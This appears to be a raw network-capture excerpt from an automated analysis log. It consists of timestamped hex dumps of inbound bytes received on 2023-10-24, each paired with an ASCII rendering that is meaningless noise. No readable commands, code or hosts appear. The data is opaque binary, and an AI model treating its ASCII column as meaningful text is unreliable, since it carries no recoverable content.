                                                                                                    2023-10-24 04:55:22 UTC2145INData Raw: ee 88 f0 48 6a 63 0c b7 d6 a3 a7 f8 4b d8 c9 2b ec 0d 6a 12 89 30 1a db 37 dc 36 24 ab f1 b3 9d c9 6d 10 6e 64 ac b2 8e 33 de 5d 20 6a 37 e0 ec 41 d2 72 65 6b e0 05 97 4d a8 24 af 40 7f 05 3f 16 97 cb 87 20 da 2e f3 37 60 27 3c 46 2f f1 53 3e 16 9e a0 ab 03 b4 81 c2 22 69 3d 3b b9 bf 2d bc 91 1a a8 a3 b5 25 fa 45 78 03 79 d5 72 24 64 f4 96 47 d1 3b 28 9d ce 02 74 c5 bd c9 1a a3 8e dd 42 9d a9 ed d4 2b 5b ae 33 05 ef 82 8a 4e 35 83 7c 97 a6 38 bb a0 eb bb 34 95 b5 2b b9 e5 53 1c 65 1b 68 22 c4 d7 15 3b b3 d7 13 50 4f 69 27 e0 19 61 8f ae d1 47 45 f3 65 62 6b 54 45 68 2f 0d 54 8a 04 75 40 5f 4f e5 d7 28 7b b0 b9 d0 5b 9a a8 dc 51 33 70 b5 45 05 f6 ca 2b fc 92 8f 83 ef fc 05 c4 f9 7c 61 05 f3 11 c8 4f da 89 d3 e4 c5 e8 04 be 04 f9 39 09 70 55 5f d8 03 db a4
                                                                                                    Data Ascii: HjcK+j076$mnd3] j7ArekM$@? .7`'<F/S>"i=;-%Exyr$dG;(tB+[3N5|84+Seh";POi'aGEebkTEh/Tu@_O({[Q3pE+|aO9pU_
                                                                                                    2023-10-24 04:55:22 UTC2152INData Raw: d3 f8 50 79 c5 ce 3a 74 ab 11 d4 94 fe ec e4 ee 7b f8 b4 53 e4 ae 91 ca ca 0c cc ad 02 64 7f cf a6 b3 bf c3 99 32 ca 43 b5 32 f1 fd ab e7 e2 4d c9 27 22 7e f5 ba cf 9c 86 68 4f c1 3f 3b 1f 4b eb fd cd 5f 98 17 49 26 c8 69 c5 9c ee 29 6a 15 af 93 a7 b0 e3 20 36 12 d9 79 4c 0d 37 29 e4 bb f2 21 d7 08 f9 ae 7c 4d dd 76 50 71 ba c1 d3 cf 33 af f8 ac 66 a2 53 c3 13 c3 d4 e5 aa 8d d3 cb 9b 14 a6 dd 8a 99 9c b8 cd a5 12 1a 44 03 c7 01 46 51 46 29 13 a8 c8 f9 ca 9d 49 29 fa c5 46 c0 e3 7c e5 ce 76 81 6e 5c 7f e1 02 20 ff 97 81 2c 5c 41 e6 a3 49 82 4d 01 2b 8c 94 e7 a0 25 c1 2d 3c 55 b9 7a 8e de 42 a6 69 2d 7d a1 cc 04 26 4c 11 68 23 d4 1c 77 49 9e da 9f 89 a7 31 05 f4 ef 61 e7 fe c0 6f 12 b7 cb bb d1 01 bc 97 3f 24 1e 97 cf a2 4b f8 1a 6f 31 75 d9 9b 2c 5b 44 2a
                                                                                                    Data Ascii: Py:t{Sd2C2M'"~hO?;K_I&i)j 6yL7)!|MvPq3fSDFQF)I)F|vn\ ,\AIM+%-<UzBi-}&Lh#wI1ao?$Ko1u,[D*
                                                                                                    2023-10-24 04:55:22 UTC2160INData Raw: 52 39 a5 be 6a 72 2d 00 c7 8e 00 14 b8 86 db 21 9c 90 1e 00 ba 48 cf c5 89 a5 e5 0a 10 f9 1a c4 4b 33 99 9e 9f 74 e1 fb 8a 23 e4 d5 80 46 9f f0 34 1f 06 a8 7a 9b d0 0a 50 ce 0e 75 bf d6 44 cc 2c 4f c4 9f e8 b5 4c 09 f8 55 90 74 36 36 59 0d 20 53 95 81 3d ba d8 79 85 a7 ea 9b cd d2 ce 4e 6f 0f 79 6d 0c b3 e3 46 95 49 e8 01 7b b0 a6 d0 51 fa 4b 99 0b cf 3d 27 a5 57 d6 e1 33 80 a9 aa 2a a2 fa 5c 7f 26 35 42 ad 00 0f d4 35 17 01 2a ad 4a c6 1b c7 ad b7 a8 92 b6 58 bf 6f 16 76 74 c0 0c 8f 8d 6a f6 00 60 22 b7 f4 48 b3 ba e3 78 23 c9 5a a3 b9 3d c2 3d 14 ba af 2f 00 5e 1f f7 4d 99 84 24 78 46 01 c1 00 ae f5 75 60 33 77 49 70 e4 21 68 53 f0 2c bf 1e 22 b0 b8 5b 4e ab a3 ab a6 05 5c 37 f2 c7 62 d1 91 71 71 f9 6e aa 2f b8 8f 04 4d 6e 06 38 2c 1e 72 bd a3 74 50 57
                                                                                                    Data Ascii: R9jr-!HK3t#F4zPuD,OLUt66Y S=yNoymFI{QK='W3*\&5B5*JXovtj`"Hx#Z==/^M$xFu`3wIp!hS,"[N\7bqqn/Mn8,rtPW
                                                                                                    2023-10-24 04:55:22 UTC2168INData Raw: da 07 bf b5 a0 5e dc a4 6c b2 b9 42 6a ce f4 54 dd 8a dd 1f f7 08 ce 99 57 6c d7 5d e6 be f9 d4 76 dd 65 3e 98 99 53 b5 71 ff ae ef d7 d5 47 a2 6f b5 b1 c5 da eb db a3 1c d5 ce 1a 57 ad bb be 7b 4a 5e ad a2 59 0f 32 e6 4c 75 a7 fe b3 99 85 b8 05 dd 8e 09 6e 07 58 3e 0a 45 fd 85 16 21 ef 91 29 13 72 51 13 c0 11 cd 28 d7 d1 bc a3 a7 3b e5 3a 9a 0f f6 8c a4 5c 47 f3 e9 9e 39 d4 42 66 39 b7 16 ad f4 ac a7 5c 0d 93 bd 9e c3 d4 09 87 d7 ba 9e 43 1f b8 6c 28 9b 27 3f 15 c1 16 e7 cb 08 65 80 25 10 1f ed f6 42 7f ef 08 7a 06 bb 32 b5 33 f0 1c f2 4e b0 10 49 95 65 3c 80 28 1a e0 16 90 63 c9 0d d5 4a bc 19 72 f7 63 ee 03 0a c4 65 e9 5a ac cd f7 81 a8 9b 41 af 61 b7 f1 c7 00 e5 3d a5 b3 00 37 8d c2 e5 a4 ea 4c 43 ae 1d 1a 84 17 48 cb 98 5d ce fd e0 5b 29 03 54 d8 62
                                                                                                    Data Ascii: ^lBjTWl]ve>SqGoW{J^Y2LunX>E!)rQ(;:\G9Bf9\Cl('?e%Bz23NIe<(cJrceZAa=7LCH][)Tb
                                                                                                    2023-10-24 04:55:22 UTC2176INData Raw: 5a a5 00 67 f6 d2 07 41 2e 1e 25 4f 56 67 eb 8b cd 35 f6 6a f8 3c 7b f5 63 80 aa cf ca 57 d5 bb fa 53 f3 b5 fd 0a a2 34 87 5e c0 8c f0 85 2b d1 5a bc 51 c1 aa e1 ab 0e 91 2e 1a 96 d5 c8 f7 8d d2 12 fe 66 b2 35 00 32 f5 08 c8 fb 33 ad 85 be 05 f0 b9 37 19 bb ad 23 be c3 50 63 62 cc 04 bb 9c bf 8c 5a 53 17 cd 26 76 d7 3f f4 84 dd 5e de 62 7b a5 df ed e5 b9 5e 97 a4 97 77 ca be e0 77 7b 79 77 ec 87 7e b7 97 f7 c6 4e ef 77 7b 79 79 ec 00 7f 3e c7 bb a6 74 78 b5 28 72 4f 18 c1 14 01 16 17 fd bf be 3d 70 9a ba c3 bc e7 f2 a2 60 2f f1 bc 6d 08 11 3d c8 3b 9b 5e c2 ee e3 8f 08 07 bc c7 e8 d3 8e 56 ec 6b 6f 76 9a dc 95 d1 58 a1 1a 33 1d b9 81 68 38 9e 42 cd 65 b6 71 07 d0 31 7c 99 22 b3 6c b9 50 9c 18 47 27 3a da 08 a6 d8 9a 1e 0f 99 72 07 b0 d9 5b f4 3b 36 0b 5f
                                                                                                    Data Ascii: ZgA.%OVg5j<{cWS4^+ZQ.f5237#PcbZS&v?^b{^ww{yw~Nw{yy>tx(rO=p`/m=;^VkovX3h8Beq1|"lPG':r[;6_
                                                                                                    2023-10-24 04:55:22 UTC2184INData Raw: 0a 39 21 f4 1d d3 29 5f e8 2c 44 1b 8c 43 e4 37 eb a5 f3 12 25 35 22 48 7e bb ba 5b 5d d7 70 43 b3 83 3d c2 1d a1 4f c3 cb cd 6d f6 79 f7 3c 3c cb 7b f3 1b 3b af 97 d7 28 43 02 96 09 b9 a6 1d d5 13 b5 e6 38 5b bc 2d f0 2c 57 ac c7 ce d7 de d7 46 a4 59 d8 ae e4 e2 10 86 67 e9 6c 0f 72 67 85 66 c1 b3 ec b2 4f ba 8f 42 8f e0 59 d2 02 5b ac 10 ae 00 cf e2 3a 2d bd 01 e1 01 8c 37 ae f3 8e 87 8f c3 b3 3c 77 92 50 67 f5 88 ac 93 4a 46 4d 8d 8d 89 8d 0e 14 e5 aa 0a 8a d4 5c 69 1e e8 ca 0d 13 a6 48 bf 28 bf 04 f6 70 d4 89 20 91 92 28 90 9e cb 2d 96 06 7e 20 05 43 50 9b 7a cb 93 d4 49 c1 85 fc 26 60 22 b7 d4 5b c1 97 7c 72 31 42 2e a9 95 e4 aa 0b ba d4 50 e9 a9 f5 e4 46 08 33 a4 e5 ca 01 ed 00 e4 99 07 d2 7b 25 b3 96 99 cb 2b 96 93 03 6a 18 b5 e2 fb 8a d3 e4 a5 ea
                                                                                                    Data Ascii: 9!)_,DC7%5"H~[]pC=Omy<<{;(C8[-,WFYglrgfOBY[:-7<wPgJFM\iH(p (-~ CPzI&`"[|r1B.PF3{%+j
                                                                                                    2023-10-24 04:55:22 UTC2192INData Raw: 3b a0 1e fc 66 f1 90 7c 1e aa f5 43 a8 6e 61 a5 a7 36 4a 7f 27 14 92 75 b5 2e 1a 6c 4c 13 7f 91 6f aa af d1 57 46 12 31 03 e0 77 4e b7 30 96 c2 4a 53 ad b5 de 07 af 62 a7 7e 77 20 f3 3c 97 92 2a 15 d8 89 6d 23 60 74 dd 50 7f 63 22 99 44 15 8a 58 a6 fa 04 2c b2 14 bc 0f c3 34 98 73 ef 20 bc cd a4 33 d8 0f f5 37 f8 1b 13 d8 06 d2 21 c6 3d e7 af 75 c6 fe 49 dd d8 b6 3e 39 54 fb a9 44 e4 64 c0 20 44 ad c8 df 10 77 29 03 d0 30 83 66 99 b1 ea 24 34 c3 98 22 ce 92 17 50 b5 11 63 b9 48 5d 3a 44 03 31 a7 6c ea 1b d1 84 34 90 17 42 ac e4 22 1d 2c aa b2 6b 60 c7 ac 67 27 28 fb 77 b4 13 94 fd 07 db fd b5 04 2f 74 da 77 ec 7b a1 2f 05 d4 3e d5 3e ec c6 c4 16 8f 98 19 99 2d 8a 76 ca b7 0f 74 e1 fc 4e f9 81 81 e1 dc 2d e1 01 64 a7 47 81 e7 dc 5b e1 13 bc a7 44 81 76 c2
                                                                                                    Data Ascii: ;f|Cna6J'u.lLoWF1wN0JSb~w <*m#`tPc"DX,4s 37!=uI>9TDd Dw)0f$4"PcH]:D1l4B",k`g'(w/tw{/>>-vtN-dG[Dv
                                                                                                    2023-10-24 04:55:22 UTC2199INData Raw: a2 38 5b de a2 ee 43 b7 8c 5b 62 0a b9 84 56 01 f2 4e 75 89 87 48 f4 f4 c6 b8 85 34 54 59 ab 9d d4 13 03 02 68 05 7f 3f dc 98 4e a8 3e 3c d5 61 da 48 7c 55 80 fd c6 51 e2 ab 02 5c 34 ae 93 cb b4 cb 00 3d 31 5e 91 67 5f d4 84 29 06 a8 87 e8 ad f1 40 73 92 b2 5a fb 15 38 e6 33 f3 19 70 ad cc 3a cd 1d 01 b5 2e 6a 6f 0c 27 33 ac c5 10 a7 14 29 d0 dc f9 0e 51 cd 88 22 f1 e7 a2 1d 59 67 fa 4c 7d 03 de 66 ee b1 a9 52 c0 67 5c c8 8a 73 82 c0 c8 3a 91 69 d6 4e c8 75 77 8d a7 e4 9d 95 04 22 ec 1b 40 8a d1 76 3e 37 2f 64 d8 72 66 35 9b 73 05 d8 69 d3 e3 ef 61 a9 76 c8 61 fb 84 7b 54 3f 85 2f 98 57 ed db ee 75 fd ee 7f d2 8e 89 70 f3 1a c5 81 a7 7a 4e 2b ef 7b 63 04 7c c3 0a 67 a7 47 a7 fa ae 59 5f c5 eb 96 fd b5 3f 31 30 a6 10 bd 01 68 c1 d4 92 17 40 d6 a3 27 27 23
                                                                                                    Data Ascii: 8[C[bVNuH4TYh?N><aH|UQ\4=1^g_)@sZ83p:.jo'3)Q"YgL}fRg\s:iNuw"@v>7/drf5siava{T?/WupzN+{c|gGY_?10h@''#
                                                                                                    2023-10-24 04:55:22 UTC2207INData Raw: 10 d0 71 d1 34 df 97 33 dd 3a 85 ee e0 a7 34 07 8b b3 ca ea 95 48 53 c3 02 5e dc 42 4f 23 9d fe 56 95 9a 6f 26 f2 aa bc 19 22 eb a8 79 06 6a f1 55 72 d7 78 66 96 75 6a e2 00 f5 58 6b ab ab d3 17 4f 02 24 b1 dc da 0a 75 f7 2c bd cb 72 02 be e2 bb 95 8d 4c 17 50 43 1a 44 e7 48 73 8e bd da dd 41 4e 1b 57 cc 47 80 77 8b d2 b2 c0 d0 34 a7 a5 d7 92 76 66 03 00 f9 2c f6 36 c2 7b 38 61 5d 04 cc 15 d1 91 7f e6 64 f0 22 3a f2 f9 9c 28 7f 12 2b c1 2e e5 56 08 45 36 f1 39 63 6e 64 c8 50 c5 3f 07 6e 3f c1 98 6f fe 60 1f 74 af 86 6e 1b 4f cc ec 76 bc 5b 2d 9c cc b0 bf ad d8 2f 3c 88 cd b7 96 00 02 3e 01 b5 f3 e2 3f a1 8c 0c 50 3b f3 bc 51 b9 be 59 b7 58 a7 18 ae 2f 5a 5c 29 a3 25 06 ca 09 95 a5 9a 4a 8a 96 14 68 e8 cf 18 84 b5 b0 af a2 30 86 6b 4f 06 76 0a 87 a0 2f df
                                                                                                    Data Ascii: q43:4HS^BO#Vo&"yjUrxfujXkO$u,rLPCDHsANWGw4vf,6{8a]d":(+.VE69cndP?n?o`tnOv[-/<>?P;QYX/Z\)%Jh0kOv/
                                                                                                    2023-10-24 04:55:22 UTC2215INData Raw: c3 44 37 32 0d ba 12 78 fe 46 40 84 47 80 25 5c 76 2f 93 3b c0 f8 33 01 0f cd 43 62 58 22 30 82 24 2f 89 36 64 e2 9f 55 b9 93 d5 fb b5 8e 08 9f b5 59 ea 45 14 90 f7 3b c7 bc 63 f4 2c bb 06 b8 e8 85 77 cb 78 c5 b7 8f dd a8 bf 70 b3 6c 62 89 0e f2 58 d8 05 7e 31 de 59 e4 6d 0f 6f 67 e9 d6 71 e0 ba 37 c2 37 a0 8b e5 77 8a 54 4a 2d 76 cc d7 ae ac 0f a8 fb bd 40 07 a8 a2 33 94 d5 da ea c0 4e e1 a4 74 5d c9 ac 65 0e 14 16 ca cb c9 aa 8d de 0b 76 16 47 c9 4b b8 b6 69 f0 82 f8 54 ce a1 96 d0 ab 08 0d 7d 25 a7 1e be 5f e5 32 e8 e9 6f e9 a9 a2 2c 33 88 87 ae b8 a7 38 50 9e a6 ae 40 fb f0 0d a8 a6 ad b5 77 f0 00 7a 41 ce a8 e6 40 9f 91 f2 ec 53 75 11 ca 8e 53 8d fd 76 1a b0 c2 38 73 2a e4 c7 01 72 d2 bf 75 cb 00 f9 11 65 94 b5 7a 39 ab bd ef a9 07 dd 6d 98 3b 27 b4
                                                                                                    Data Ascii: D72xF@G%\v/;3CbX"0$/6dUYE;c,wxplbX~1Ymogq77wTJ-v@3Nt]evGKiT}%_2o,38P@wzA@SuSv8s*ruez9m;'
                                                                                                    2023-10-24 04:55:22 UTC2223INData Raw: 6f a5 16 03 0f be ae 5d 83 9f 7c 81 de ab 09 a0 0b 51 0f 94 08 35 07 c9 25 16 01 46 4c 00 41 b6 13 c7 c9 33 a0 87 1c 26 77 e8 46 96 92 06 18 5e 3a 91 fa 9b 95 87 ba 6b 49 5d 81 1d d0 fd b0 e3 c0 c2 1f 43 ed fc eb b3 b9 ff bd 0f f1 ef 73 d7 f5 14 6f eb 9a b2 5e 6f eb 7a 80 3c 54 f1 b6 ae 27 cb 33 7f ec f5 2c 97 ff d8 eb d9 2d ff b1 d7 73 5e 7e e9 ce 82 c7 98 31 80 ac 6b 00 c3 6d 61 0e 04 0e 7b 5c 7b 01 c8 f2 15 4a a7 66 d6 22 8d f2 56 19 a5 a2 ab 52 3a d0 1a a8 2c c0 ab e0 27 ef 58 d4 43 ea 35 f4 c6 a4 16 f5 90 ca 0c 9f 91 d7 ee 0a e8 66 be be d3 bc 62 67 c7 e5 01 b3 4c a3 f3 57 03 e3 c2 fa 64 c9 12 f9 01 4d 67 57 f2 9b a1 9a fd bb 9a c1 5d e8 ed 2f e5 b7 4a 3c fb 9e ff 2a 26 96 4b aa 26 57 53 e8 02 5d e7 b8 fa 08 d8 a3 e7 3e e4 f9 68 ff b5 fb d0 ff 17 9d
                                                                                                    Data Ascii: o]|Q5%FLA3&wF^:kI]Cso^oz<T'3,-s^~1kma{\{Jf"VR:,'XC5fbgLWdMgW]/J<*&K&WS]>h
                                                                                                    2023-10-24 04:55:22 UTC2231INData Raw: 47 d8 0b fc 4d f1 a9 fc 46 79 c7 7e 87 2a 9a 49 ce aa c6 70 05 84 12 52 65 c4 aa 3c a7 09 b5 a5 26 50 e7 da 73 bd 85 c1 c0 61 66 a8 b3 a0 93 ad 97 76 b8 13 10 54 51 e5 09 64 fd 5b ee 9b 90 02 7a 5a 0c 8e e6 f3 03 3b ae a4 30 98 e3 31 e0 b7 c6 80 89 da b9 73 4e e3 94 e9 78 26 bf 48 5c 27 6f 87 ea 70 88 3f 27 5e 07 fc fa 3b 7e c3 7f 75 a7 80 a9 3f 04 dd 9e aa 08 ef 98 15 54 a9 26 b0 e8 76 5a 5b 57 a1 60 ac 3a 4d 9b 21 2c 94 d6 a2 6d ea 21 ed a0 70 56 ba 86 1e a9 f1 c0 ac bf 50 95 15 40 0f 11 62 0e 39 bf 52 0a 3a 55 79 c0 1d 8a 12 c4 0d 49 63 b1 8d dc 43 19 08 28 75 b4 38 5d 5e a0 ac 81 68 a0 8a 27 67 94 ab f8 21 79 00 35 ec b3 92 0c a7 23 19 c4 2c 28 8f 5a 54 2b af 97 93 fc 08 01 92 6e a0 37 92 5a 43 8c 0d 00 0c 3b 4a 9a 86 e6 ab ab b5 2d fa 36 e8 df a7 d5
                                                                                                    Data Ascii: GMFy~*IpRe<&PsafvTQd[zZ;01sNx&H\'op?'^;~u?T&vZ[W`:M!,m!pVP@b9R:UyIcC(u8]^h'g!y5#,(ZT+n7ZC;J-6
                                                                                                    2023-10-24 04:55:22 UTC2238INData Raw: 62 77 86 5f 2b 83 f1 08 12 7a de a9 50 a1 43 cf cb f4 3c 36 8a 27 e4 47 ca 27 38 82 30 35 89 3a c0 65 ff f0 ab ec fb a7 39 f5 0f 6b 47 87 66 4e 4f 42 56 08 cd 9c de 96 1e a0 67 1f f0 b5 2c 47 ab c1 3b 6c 88 5b 7a ba a6 bd e1 99 66 b1 fe 2e f9 b4 72 0b bf 21 51 34 af 57 47 9a 01 56 18 89 66 40 26 3f cb 7a d9 00 3d c7 90 3a 6c c2 c1 73 75 19 47 a7 98 0b 95 95 80 f4 58 5d be a6 dc c1 19 49 55 a3 ad 35 48 5d af fd a2 67 84 98 68 82 bf 21 db e8 6d b3 10 64 95 9d fa 2d 23 ca 1a e9 e6 d7 eb 1b bd ac 3b 4e ea 40 29 da 1e 98 e7 3d 37 b6 54 d5 b0 d2 de 3c 62 02 6a e5 cb cf d7 12 a7 02 a7 6f c4 0d 10 26 41 4e c8 ac 16 e1 67 8b ab e5 43 ca 03 2c 09 89 52 57 b4 4e 3d a6 fd 0e 75 b0 20 44 6e 27 32 1e f2 cd 2b a5 80 b6 58 7f 21 ed 52 22 49 79 d8 97 86 57 17 77 d1 5b e6
                                                                                                    Data Ascii: bw_+zPC<6'G'805:e9kGfNOBVg,G;l[zf.r!Q4WGVf@&?z=:lsuGX]IU5H]gh!md-#;N@)=7T<bjo&ANgC,RWN=u Dn'2+X!R"IyWw[
                                                                                                    2023-10-24 04:55:22 UTC2246INData Raw: cd b1 a7 51 33 73 05 c5 0a b2 4f 91 b0 c1 07 c4 26 9e cf 67 cf 64 e4 b3 1b ef e2 0f 89 3f cb 57 20 4b 14 10 26 26 f7 b8 ae f9 80 7b fb 7d e5 09 e0 ce 67 e2 6f 72 4a 25 3d ce 42 32 88 d9 00 a1 b0 7e 88 58 a9 c0 3f 9e 4b 39 6a 1b ed 2b 7d 83 b4 13 1d 82 bd ca 4e 30 ee a2 67 6a 36 40 f9 a5 a0 82 b9 50 b7 fa d2 d1 f2 2c 65 33 7c d7 35 fa 50 ce a5 14 d5 aa ea 9a d1 02 f5 54 47 6a e3 74 e6 65 5f 2b 62 04 e4 17 57 9b 28 2c 91 98 97 e7 73 8d 29 b7 1d 57 cf 6a c7 28 ab d5 61 b8 b8 be da b8 85 0a e3 29 e4 3a cd 6e d6 53 3b 6a db f4 b7 46 35 bb 11 ee 44 a6 d0 83 66 01 27 1e d8 67 00 b2 4e 7f 67 9a b6 55 bf 61 e4 b4 7c ee 11 fd 82 71 df ca e2 94 0c d6 a2 ed cd a1 f6 0e f7 e7 e0 2d fa 09 3b 27 9c e6 8b db 0d f9 af 21 ec aa e5 28 de 5f 85 e7 44 5b 9e ab 9c f7 17 01 8e
                                                                                                    Data Ascii: Q3sO&gd?W K&&{}gorJ%=B2~X?K9j+}N0gj6@P,e3|5PTGjte_+bW(,s)Wj(a):nS;jF5Df'gNgUa|q-;'!(_D[
                                                                                                    2023-10-24 04:55:22 UTC2254INData Raw: a1 9b 37 e6 48 1c ba 79 63 d3 8e a1 9b b7 c9 68 a6 1a ba 79 5b 8a 56 a9 a1 9b b7 ed 68 af 1a 42 0b 27 3d 9d 9a 1c 5e df ab 83 db 93 51 74 a3 b9 4b b9 04 fb 25 2f 70 25 5e 6d 06 99 7f 92 b1 da 5a ad 6e d1 f6 e9 c7 8d 73 d6 39 f5 86 c6 dc c6 d3 58 69 d4 ac 5a 84 9e df 2c 61 97 c0 15 49 2d 2a 98 ba ad e3 06 a4 05 fd d2 ec 65 f7 62 73 53 74 8a 39 d7 9e 8b ff d0 43 3c 88 ff d0 43 7c 8a 93 f5 10 ed 18 ed 0f 3d c4 7a 5a 48 0f f1 cf fe d3 e3 80 a1 2d 30 56 5a 9b 9d cd da 1e fd a8 f1 8b 75 cd b9 e6 79 09 a6 b2 32 3b 99 b5 30 88 eb 62 9e 7e 53 0d ca 79 d3 49 01 d2 8c b6 87 bc 3a c0 1d 40 46 d2 49 e6 6c 7b 89 bb 84 ac a5 db cc 1f 01 8f fc 44 2e d0 5b e6 63 fb 77 f7 77 36 5f 65 46 d9 05 03 05 3d 67 b3 66 4e f7 40 77 fd 1b 63 a6 b5 d0 d9 10 38 a0 3f 80 cc 9a d9 29 18
                                                                                                    Data Ascii: 7Hychy[VhB'=^QtK%/p%^mZns9XiZ,aI-*ebsSt9C<C|=zZH-0VZuy2;0b~SyI:@FIl{D.[cww6_eF=gfN@wc8?)
                                                                                                    2023-10-24 04:55:22 UTC2262INData Raw: d3 d5 e6 06 7b ab bb e9 8f 19 c5 a3 c0 96 cf 9b 57 81 b3 5c 27 77 81 37 bf 84 ca fa 9a 7c fc d3 0a 66 00 aa ef 6e 7c 6f fd e4 1c 0b 5c d2 33 19 51 76 1e b7 58 b0 18 ad 00 bb 42 74 69 30 a4 03 d2 d9 ed 13 ec 43 87 9a e3 ed e9 ee c2 e0 42 d8 1f 9b ec dd ee d1 e0 51 7a ce 7c 0a 2c 30 3c 18 b6 3e 21 b2 5a 6c 4c 6c 6e 54 c8 97 c0 59 10 1f 63 d0 0c df 0a 88 ca 53 d2 03 f4 cc 97 1c f0 55 55 59 52 a8 bf 19 c4 f8 42 40 c9 db fc c7 f9 3b 62 52 39 8b 92 8b 2b 2b a8 92 83 da aa a3 39 56 69 76 b3 d3 29 ee b5 90 11 30 63 29 ad 2e af 8b cd e4 3e ca 0c 6d 31 44 27 eb 58 62 dd f9 80 3e 51 75 15 63 03 62 b2 1f d4 a8 d5 78 03 e0 85 fb 80 3f 33 e2 42 c0 74 65 a5 01 cb 5a e2 4c 79 b5 b2 97 75 5f 8a 8f e5 54 4a 66 a8 04 c5 25 3f d2 d4 86 c0 af 06 48 23 99 66 19 ac 3f eb 81 be
                                                                                                    Data Ascii: {W\'w7|fn|o\3QvXBti0CBQz|,0<>!ZlLlnTYcSUUYRB@;bR9++9Viv)0c).>m1D'Xb>Qucbx?3BteZLyu_TJf%?H#f?
                                                                                                    2023-10-24 04:55:22 UTC2270INData Raw: f6 58 5e 36 9d b1 bc 02 5a 29 52 85 56 f1 b0 41 c8 e9 f9 5b 65 3c a0 da 0d 74 2f a0 d0 27 5a 52 d6 1b 02 bc cc c0 df 02 93 9a 0a 9f b6 0b 72 d2 7d e3 29 4a e6 dd 40 56 36 eb c2 5f b6 84 48 1b 65 32 dd bb 4d e4 04 bd 66 3e 54 92 43 5d 2b 68 d4 b1 78 c8 7d 9d f5 41 c6 54 6b 81 ba 16 1f d4 2f 01 86 7a e4 f9 a4 e7 30 4b d8 55 34 8d e1 73 6f fa 71 16 ac e6 3e f3 84 fd ab 76 87 bc 81 28 88 73 0a 60 76 2f a3 5b ad 9c 5e 78 08 60 bf e5 9e 96 e8 11 a8 8d af ad 8f 4e 56 1c 43 f3 9a c5 ec f2 50 11 ab 53 bf a9 da b6 6b 91 86 80 9c d8 c4 52 2f 6f b6 82 f5 c7 9e 20 bf d2 77 e6 ef 36 eb f3 60 1d bb 6d 9c 4e 81 91 50 97 4f 59 97 9c 4f 81 77 7a 84 59 d3 6e e1 4e 08 ae 86 d5 bf 6d 3f 74 9f 07 43 b7 e8 df b8 19 82 a1 5b f4 98 a2 28 fe 31 60 90 50 87 53 2e 5f 01 ae 98 50 46
                                                                                                    Data Ascii: X^6Z)RVA[e<t/'ZRr})J@V6_He2Mf>TC]+hx}ATk/z0KU4soq>v(s`v/[^x`NVCPSkR/o w6`mNPOYOwzYnNm?tC[(1`PS._PF
                                                                                                    2023-10-24 04:55:22 UTC2277INData Raw: 6e a6 2d a7 c9 02 cd 12 9d c0 20 33 89 40 ba d5 e9 a2 0d 09 a6 58 55 a2 26 5d 97 6d 58 63 1a a8 e6 55 68 1a a8 e6 65 31 e1 9c 06 2f 1b 0e 98 70 4e 83 77 0d 87 4d 38 a7 c1 09 43 97 a9 43 75 b6 df b7 f1 ba ea 96 e6 2e f0 4a ce 26 7b 95 8b 66 ac ce dd 40 31 11 fe ca 27 bb b1 40 96 14 53 38 9e 5c 9c 55 33 94 33 8d 8b b3 6a 46 70 22 b9 22 5b de 60 14 d5 88 3d 5a 92 39 99 5c ec d1 82 3c 98 b0 47 4b 09 a7 9c 8b 3d 5a 9a 38 7b b9 d8 a3 05 51 44 ec d1 72 84 f3 39 17 7b b4 74 73 ae 70 b1 47 cb 6d ce 7d 2e f6 68 71 e5 8c e7 12 1e 33 5f 06 f6 68 49 8f 1c a8 97 96 1f b9 85 87 3d 5a ca 22 ab 79 96 fe 5c 07 2f f3 b0 5f fe 9b 91 ef f2 0e f7 d7 59 39 c1 eb 12 5c 10 5d 95 5c 8a bc c6 bb 29 b8 03 d2 fa dd 48 94 1b 79 cc 03 4a ec 29 66 4b 59 5c 7f 7e a8 70 9a 78 b6 74 06 77
                                                                                                    Data Ascii: n- 3@XU&]mXcUhe1/pNwM8CCu.J&{f@1'@S8\U33jFp""[`=Z9\<GK=Z8{QDr9{tspGm}.hq3_hI=Z"y\/_Y9\]\)HyJ)fKY\~pxtw
                                                                                                    2023-10-24 04:55:22 UTC2285INData Raw: 32 a0 97 64 1b 5c 3a 3d 85 19 49 64 c2 b7 15 f4 55 4c 13 31 96 bc 14 46 63 33 e3 e0 bf 71 d4 64 e8 4f 4b 5c 46 4e a4 26 ad da c7 44 72 2d 03 66 4f 67 10 88 9f f4 af 52 35 64 bd 23 b5 1c a1 e5 33 e3 a8 1f e5 63 df ab f3 8f 13 e3 2e ce 4e df f0 7c 51 f8 8e 2d 9b 9e db f6 ec 96 b9 79 cf 6d df b8 a9 60 d6 da bc b9 3b 76 6e 9f 91 b7 69 96 29 39 63 de b6 c2 35 6b 97 b0 fd 7c 17 f4 f7 f2 af 65 ae ef 79 08 ca dc c6 2d a9 24 4c e4 d5 52 78 b3 be 77 1f 17 59 4d 92 2d fc d6 ed 07 f8 16 10 d4 45 71 5b 5c ee ce 09 78 95 44 b1 c1 55 11 de e1 d6 52 bc 7d ff e4 3e 16 e0 ae bb ba b8 5d 04 b8 6b 2e 14 ca 18 80 bb ea ec 4e 72 07 b8 e4 fc 75 1b 50 7f 03 73 4e 8f 27 10 e3 29 0c 6a d8 a7 5f ac 7b 80 87 98 64 10 3f 00 ef 7e c5 62 12 62 30 fd 75 7b 9e 42 24 05 40 eb 47 16 e2 5e
                                                                                                    Data Ascii: 2d\:=IdUL1Fc3qdOK\FN&Dr-fOgR5d#3c.N|Q-ym`;vni)9c5k|ey-$LRxwYM-Eq[\xDUR}>]k.NruPsN')j_{d?~bb0u{B$@G^
                                                                                                    2023-10-24 04:55:22 UTC2293INData Raw: cf b6 ce f5 c4 a4 e6 a8 05 4a 67 c7 02 22 a9 a9 70 fe 4c a7 d0 dd 80 cd 76 85 4f 6d 2e 8e 08 b3 f3 ce 27 2d 07 de 56 35 aa 73 3b 89 bc 91 b2 a2 0d 4e b0 f7 e8 0e 64 ef 5e d3 46 5e 4f b1 5e a4 04 6f a6 67 c0 ee 4a ed df 2c 41 76 e7 15 0d b4 8d 8c e6 2b f4 b0 3c 42 22 f0 d9 0a a7 b6 5d b6 fe 96 89 27 36 30 4a 23 1b 57 93 9b ae 42 2f 4b 7a 97 17 21 ab f4 4e bf 9e 78 0f 12 59 35 2e 67 55 b5 ef 73 e3 7b 4c 54 6a 09 7b 94 c4 9d 48 5a 91 1d ab f1 a8 ba f2 9c 7b ff b7 b9 b6 6f ad c5 11 62 f3 b8 be a0 0a 58 e5 45 57 1f c2 f6 00 72 91 3f ea e5 6f e7 c9 94 35 6b 90 8e e2 a4 4f bf ee eb c8 c4 f9 40 b7 3e 7c 8f 05 fc 73 06 d2 